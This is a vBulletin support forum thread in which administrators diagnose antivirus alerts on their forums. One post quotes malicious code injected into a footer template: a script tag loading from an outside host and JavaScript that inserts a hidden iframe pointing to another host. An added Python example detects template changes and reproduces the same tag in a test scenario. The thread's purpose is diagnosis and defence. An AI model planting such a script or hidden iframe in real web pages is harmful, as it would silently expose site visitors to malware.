Forums triggering virus alerts

  • Jafo
    Senior Member

  • Jafo
    replied
    Standard injection.. You are probably still vulnerable..

  • diretur
    replied
    I had the same problem on the 27th of December and found this in the header template. I have no clue where this is from. Once I deleted it, the problem was gone. Users with IE had the virus notification. As soon as they used Chrome there was no problem.

  • Wayne Luke
    vBulletin Technical Support Lead

  • Wayne Luke
    replied
    For an addon like ForumRunner to be a point of entry, they need to be using unsanitized variables somewhere. Unfortunately there is no way to write a query to check plugins for unsanitized variables. Each plugin and external code needs to be checked. As such I wouldn't point fingers at a particular addon until it was checked.

  • Jafo
    Senior Member

  • Jafo
    replied
    Thing is, another person I know who was hit with this is also running forum runner.. I wish we could poll everyone in this thread..

  • MarkTTU
    New Member

  • MarkTTU
    replied
    Maybe... I hadn't seriously considered them, but anything is possible I guess.

    I have AOL and Google ads on my site and have gone into Google to blocked all Google Certified Ad Networks just to see what happens. So far no reports of infection, but I just did this about 2 hours ago so time will tell as I've only been getting a couple of complaints each day.

  • Jafo
    Senior Member

  • Jafo
    replied
    Hmm, we are running forum runner too.. That might be the common thread?

  • MarkTTU
    New Member

  • MarkTTU
    replied
    Originally posted by Wayne Luke:
        So... Has anyone run the steps that I listed above? What were the results?
    Yep and I didn't find a thing. The only mods we have running are vbStopForumSpam and Forum Runner. Neither of those appears to be a point of infection either and I'm at a complete loss right now...

  • Jafo
    Senior Member

  • Jafo
    replied
    Should that happen, my monitoring should catch that. I am going to assume for prudence's sake that those using this exploit are watching, so I will shoot you a PM on how I am monitoring it..

  • Wayne Luke
    vBulletin Technical Support Lead

  • Wayne Luke
    replied
    Originally posted by Jafo:
        Wayne, I did not run those steps because frankly, they have never worked for me to trace back these issues, which I have done successfully many times before. I can tell you that no files had changed in some time, nor had their modification times. Their modification times had also not changed on our backup server where they are rsynced to. The plugin table had not been updated in a long time either (as per mysql information_schema table)..

        What happened is, the code was injected somehow.. In my experience, this is usually due to vbseo, not vbulletin. I am now monitoring the template table to alert me the second it is changed with all the info of who changed it, and with the $_REQUEST data. I should be able to use that and the log files to trace back what happened, should it happen again. I am assuming this is a bot of some kind, so it should be back.
    I asked because in our recent experience, people have actually been exploited months before the symptoms come up. One of the common exploits is to tie a plugin into a rarely used hook that processes commands that are then passed to the command line or database directly.

  • Jafo
    Senior Member

  • Jafo
    replied
    Wayne, I did not run those steps because frankly, they have never worked for me to trace back these issues, which I have done successfully many times before. I can tell you that no files had changed in some time, nor had their modification times. Their modification times had also not changed on our backup server where they are rsynced to. The plugin table had not been updated in a long time either (as per mysql information_schema table)..

    What happened is, the code was injected somehow.. In my experience, this is usually due to vbseo, not vbulletin. I am now monitoring the template table to alert me the second it is changed with all the info of who changed it, and with the $_REQUEST data. I should be able to use that and the log files to trace back what happened, should it happen again. I am assuming this is a bot of some kind, so it should be back.

  • Wayne Luke
    vBulletin Technical Support Lead

  • Wayne Luke
    replied
    So... Has anyone run the steps that I listed above? What were the results?

  • Jafo
    Senior Member

  • Jafo
    replied
    I have not.. However, I am going to monitor all changes to the templates database. I have it set up to immediately notify me if any change is made to any template to see if I can catch it next time..

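
Jafo's plan of watching the template table for changes, as an added example that is not code from this thread or from vBulletin: it hashes every template body against a baseline and flags rows whose body changed or now loads script/iframe content from an off-site host, reporting the editor name and dateline vBulletin stores per row. The table layout and the host forum.example are assumptions; the injected tag used in the constructed scenario is the one quoted in this thread.

```python
import hashlib
import re
import sqlite3

# Constructed, in-memory stand-in for the vBulletin 3 `template` table. The column set
# (templateid, styleid, title, template, dateline, username) is an assumption; adjust it.
SCHEMA = ("CREATE TABLE template (templateid INTEGER PRIMARY KEY, styleid INTEGER,"
          " title TEXT, template TEXT, dateline INTEGER, username TEXT)")
QUERY = "SELECT templateid, styleid, title, template, dateline, username FROM template"

# <script>/<iframe> tags whose src is an absolute URL: group 1 = URL, group 2 = host.
SRC_RE = re.compile(
    r'''<(?:script|iframe)\b[^>]*\bsrc\s*=\s*["']?(https?://([^/"'\s>]+)[^"'\s>]*)''', re.I)

def snapshot(conn):
    """Hash every template body so a later run can spot a silent rewrite."""
    return {tid: hashlib.sha256(body.encode()).hexdigest()
            for tid, _style, _title, body, _dl, _user in conn.execute(QUERY)}

def find_changes(conn, baseline, own_host):
    """One finding per template whose hash left the baseline, or whose body now
    loads script/iframe content from a host other than own_host. Each finding
    carries the username and dateline vBulletin records for the last edit."""
    findings = []
    for tid, style, title, body, dl, user in conn.execute(QUERY):
        digest = hashlib.sha256(body.encode()).hexdigest()
        if tid not in baseline:
            findings.append((title, style, "new template", user, dl))
        elif baseline[tid] != digest:
            findings.append((title, style, "body changed", user, dl))
        for url, host in SRC_RE.findall(body):
            if host.lower() != own_host.lower():
                findings.append((title, style, "off-site src " + url, user, dl))
    return findings

def demo():
    """Constructed scenario: a clean footer is baselined, then the script tag
    quoted in this thread is inserted after the <form> tag and both checks fire."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    form = '<form action="$vboptions[forumhome].php" method="get" style="clear:$stylevar[left]">'
    clean = form + '<script src="http://forum.example/clientscript/vbulletin.js"></script>'
    conn.execute("INSERT INTO template VALUES (1, 1, 'footer', ?, 1293000000, 'admin')", (clean,))
    baseline = snapshot(conn)
    injected = form + ('<script type="text/javascript" '
                       'src="http://www.uptimeviewer.com/icons/icons.php"></script>') + clean[len(form):]
    conn.execute("UPDATE template SET template = ?, dateline = 1293400000 WHERE templateid = 1",
                 (injected,))
    return find_changes(conn, baseline, "forum.example")
```

Run snapshot() once from a known-clean backup and find_changes() on a schedule; a finding with an off-site src is the injected line before any visitor's browser loads it.
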
  • eJM
    Senior Member

  • eJM
    replied
    Have you posted that information at vBSEO forums, Jafo?

  • Jafo
    Senior Member

  • Jafo
    replied
    We are having the same issue.. Right after (footer template):

    PHP Code:
    <form action="$vboptions[forumhome].php" method="get" style="clear:$stylevar[left]">

    Something added:

    PHP Code:
    <script type="text/javascript" src="http://www.uptimeviewer.com/icons/icons.php"></script>

    Which inserts:

    HTML Code:
    GPad = {
        init: function () {
            document.write('');
            var frame = document.createElement('iframe');
            frame.setAttribute('src', 'http://www.alltagcloud.info/icons/index.php');
            frame.setAttribute('style', 'display:none; width: 0px; height 0px; border: none; visibility:hidden');
            frame.style.visibility = 'hidden';
            frame.style.display = 'none';
            var div = document.getElementById('GPAD');
            div.appendChild(frame);
        }
    }
    GPad.init();
    I haven't yet figured out how it is being injected.. It could be vbseo, it could be vbulletin, could be a number of things I suppose.. I am searching the logs to no avail..

  • Wayne Luke
    vBulletin Technical Support Lead

  • Wayne Luke
    replied
    Originally posted by eJM:
        Thanks for the help, Wayne. But please remember this forum is the vBulletin 3.8 Questions, Problems and Troubleshooting forum. None of us seeking support here are using anything greater than that version.

        Jim
    Then you would need to be at 3.8.7 PL2.
